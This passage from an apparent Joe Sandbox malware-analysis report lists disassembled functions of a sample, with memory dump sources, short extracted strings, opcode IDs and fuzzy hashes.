                                                                                        Function 007D847D Relevance: 2.9, Strings: 2, Instructions: 420COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !-%.$i=+9
                                                                                        • API String ID: 0-3329930587
                                                                                        • Opcode ID: 6f3a6127ea03f0c12810755e38d89eb1c3fce6d78c26b690a1c1cad093f125e7
                                                                                        • Instruction ID: 2fd6bc69f2ce9672c6e7300665a2d25ba0f283982be9be4c7b00ac9f6f2404a8
                                                                                        • Opcode Fuzzy Hash: 6f3a6127ea03f0c12810755e38d89eb1c3fce6d78c26b690a1c1cad093f125e7
                                                                                        • Instruction Fuzzy Hash: 95D1B1B4A04245CFDF14CFA8D8D1ABEBBB1FF49304F0885A9D4169B392E7399901CB61
                                                                                        Function 007D9040 Relevance: 2.9, Strings: 2, Instructions: 376COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #&J:$1?,s
                                                                                        • API String ID: 0-2217357408
                                                                                        • Opcode ID: bd6c12e60481e07178bd607e225df913fd0459df04a2d05e5939064cd9d7d474
                                                                                        • Instruction ID: d4d3c92f0f06948ad10f95a90fb1023b16ebcfee4a7e3774d95f9165781ffd66
                                                                                        • Opcode Fuzzy Hash: bd6c12e60481e07178bd607e225df913fd0459df04a2d05e5939064cd9d7d474
                                                                                        • Instruction Fuzzy Hash: 25D14671E08144DFDB18CF69EC916BEBBB2BF49310F1881A9E1559B392D73D8941CB20
                                                                                        Function 007B4280 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: )$IEND
                                                                                        • API String ID: 0-707183367
                                                                                        • Opcode ID: 6127af7bfcb50e60b4c2a97b5d339d3fc24466344aa243c9e8ed3a70c73f2159
                                                                                        • Instruction ID: 350f0689e27a114b921e0f46e132e7387bfd1f9f1a2ea249685521a2c1ae0cb1
                                                                                        • Opcode Fuzzy Hash: 6127af7bfcb50e60b4c2a97b5d339d3fc24466344aa243c9e8ed3a70c73f2159
                                                                                        • Instruction Fuzzy Hash: 4BD19FB1908344DFD720CF14D845B9ABBE4EF94304F14492DF9999B382D779E909CB92
                                                                                        Function 00883113 Relevance: 2.8, Strings: 2, Instructions: 282COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NgUS$R
                                                                                        • API String ID: 0-1227284453
                                                                                        • Opcode ID: 912195fa3b7150b850652878b77d80a75c70b2038fa3ecdecbe6e49c4152ecb6
                                                                                        • Instruction ID: cb1d13e6d46f746741f262e0b4fd44b50744a9495faebe31e168d3480f0614a4
                                                                                        • Opcode Fuzzy Hash: 912195fa3b7150b850652878b77d80a75c70b2038fa3ecdecbe6e49c4152ecb6
                                                                                        • Instruction Fuzzy Hash: F5A186B3E115298BF3944D24CC583A2A2829BE5325F2F42788E0C7B7C5D93F6D4A63C4
                                                                                        Function 007EE262 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$MVWT
                                                                                        • API String ID: 0-308850327
                                                                                        • Opcode ID: 29131a2c6b256f59291944cf235025aa57f226c25bccedb6804b2e0f594f54d5
                                                                                        • Instruction ID: 22013768fc0dfb1cd8f6f3b4a26a9fb72da25d6cc21963fd9f1fda495e5e0e1c
                                                                                        • Opcode Fuzzy Hash: 29131a2c6b256f59291944cf235025aa57f226c25bccedb6804b2e0f594f54d5
                                                                                        • Instruction Fuzzy Hash: 694106765193818BE314CF26C49027BB7E2EFDA304F595C1DE4C1AB294DB7C8946CB46
                                                                                        Function 007DC1A3 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /:8*$x
                                                                                        • API String ID: 0-64667063
                                                                                        • Opcode ID: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
                                                                                        • Instruction ID: 288b885589acd09e32b9d286b9968fe6c0cb456c50fb3cc733ef4373b455ac8c
                                                                                        • Opcode Fuzzy Hash: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
                                                                                        • Instruction Fuzzy Hash: E301283690D7A28BD302CF299980212FFE1AB97710F194A5DD4E6A7391C529DE05C786
                                                                                        Function 0081845A Relevance: 1.8, Strings: 1, Instructions: 512COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Y%
                                                                                        • API String ID: 0-1305839261
                                                                                        • Opcode ID: a70d473a87b833f3113eaec21c47f6233042ff0c4ddc811491b14e55340e6615
                                                                                        • Instruction ID: 8bdb7eb7901626348ab5c52b1acb6119b1309a5935e22a28f68d69e3a53bfd7e
                                                                                        • Opcode Fuzzy Hash: a70d473a87b833f3113eaec21c47f6233042ff0c4ddc811491b14e55340e6615
                                                                                        • Instruction Fuzzy Hash: FF02ACF3F115244BF3444939CC583A66692DBE5325F2F82389E4CAB7C9E97E9C0A4284
                                                                                        Function 00869436 Relevance: 1.7, Strings: 1, Instructions: 482COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: etg}
                                                                                        • API String ID: 0-2051860544
                                                                                        • Opcode ID: 6d45c6ec2289fe558f9971a3ba2e9652fc37d3cd304298db8d17dfb6fa3311ac
                                                                                        • Instruction ID: ef668c3ba5f29ce23353fa0663b3e8b356fb1e144677ce6a0c1acfc112753a2e
                                                                                        • Opcode Fuzzy Hash: 6d45c6ec2289fe558f9971a3ba2e9652fc37d3cd304298db8d17dfb6fa3311ac
                                                                                        • Instruction Fuzzy Hash: 86F1CEB3F116248BF3544D29DC98366B6939BD4320F2F8678DE8CAB7C4D97E5C0A4285
                                                                                        Function 007DA050 Relevance: 1.7, Strings: 1, Instructions: 428COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "
                                                                                        • API String ID: 0-123907689
                                                                                        • Opcode ID: dac31f3e8d82c414a5d017679b608916631b9901e939ee2a43c753c5a373f89f
                                                                                        • Instruction ID: b071db03cf464a6225505893a878b55255328d56c433025b81562e16c44b889b
                                                                                        • Opcode Fuzzy Hash: dac31f3e8d82c414a5d017679b608916631b9901e939ee2a43c753c5a373f89f
                                                                                        • Instruction Fuzzy Hash: DCD1B272A08345AFD714CE68C48576AB7F6BB84314F18892EE89987382E779DD44C783
                                                                                        Function 008993BE Relevance: 1.6, Strings: 1, Instructions: 391COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8q~
                                                                                        • API String ID: 0-4200682350
                                                                                        • Opcode ID: c5704d949c02c352f00a5dd66477a56aa614c8f823bb6ead80cce23f105652ab
                                                                                        • Instruction ID: ed9b4ccea2b7b91f0e143fa86904806851ffcdb62329bc343bcb23ec0e9f9750
                                                                                        • Opcode Fuzzy Hash: c5704d949c02c352f00a5dd66477a56aa614c8f823bb6ead80cce23f105652ab
                                                                                        • Instruction Fuzzy Hash: A1D19CF3F516254BF3544879CC983626683DBD5325F2F82788F28AB7C9D87E9C0A5284
                                                                                        Function 007D74A5 Relevance: 1.6, Strings: 1, Instructions: 362COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "u}
                                                                                        • API String ID: 0-3094662062
                                                                                        • Opcode ID: 0827cce93562a824d1df85cc04d2515ca529a0186582f18583ecb38ab2285023
                                                                                        • Instruction ID: 41c877fed100be465dea26a960b291bd14877087f8f0bbba300531b882a3bfd2
                                                                                        • Opcode Fuzzy Hash: 0827cce93562a824d1df85cc04d2515ca529a0186582f18583ecb38ab2285023
                                                                                        • Instruction Fuzzy Hash: FFD1F57290C351CFD718CF28D85136A7BE2AF85324F0AC9ADE4959B3A1D738D954CB81
                                                                                        Function 0085D494 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !
                                                                                        • API String ID: 0-2657877971
                                                                                        • Opcode ID: 9f1992f26d0fc37493252bfbe6f360c16b92bf33709e4507a80d3678040dc1ca
                                                                                        • Instruction ID: 53580d2467af2c79c3c38faa6a4c36d285593043e8e952b3edef655af5055469
                                                                                        • Opcode Fuzzy Hash: 9f1992f26d0fc37493252bfbe6f360c16b92bf33709e4507a80d3678040dc1ca
                                                                                        • Instruction Fuzzy Hash: DEB189B3F116254BF3844929CD583A26683EBD1325F2F82788E58AB7C9DC7E5D0A5384
                                                                                        Function 007F0130 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
